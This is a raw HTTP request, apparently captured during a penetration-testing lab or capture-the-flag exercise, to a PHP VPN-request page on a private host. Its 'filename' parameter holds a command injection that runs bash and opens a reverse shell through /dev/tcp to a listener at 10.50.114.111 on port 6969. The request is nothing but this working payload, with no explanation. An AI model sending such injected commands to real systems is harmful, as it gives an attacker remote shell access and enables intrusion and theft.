GET /requestvpn.php?filename=mohammad.ahmed@corp.thereserve.loc;/bin/bash+-c+'exec+bash+-i+%26>/dev/tcp/10.50.114.111/6969+<%261'  HTTP/1.1
Host: 10.200.113.12
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.200.113.12/vpncontrol.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=aagu5hfcgamara83udr5q4ej36
Connection: close

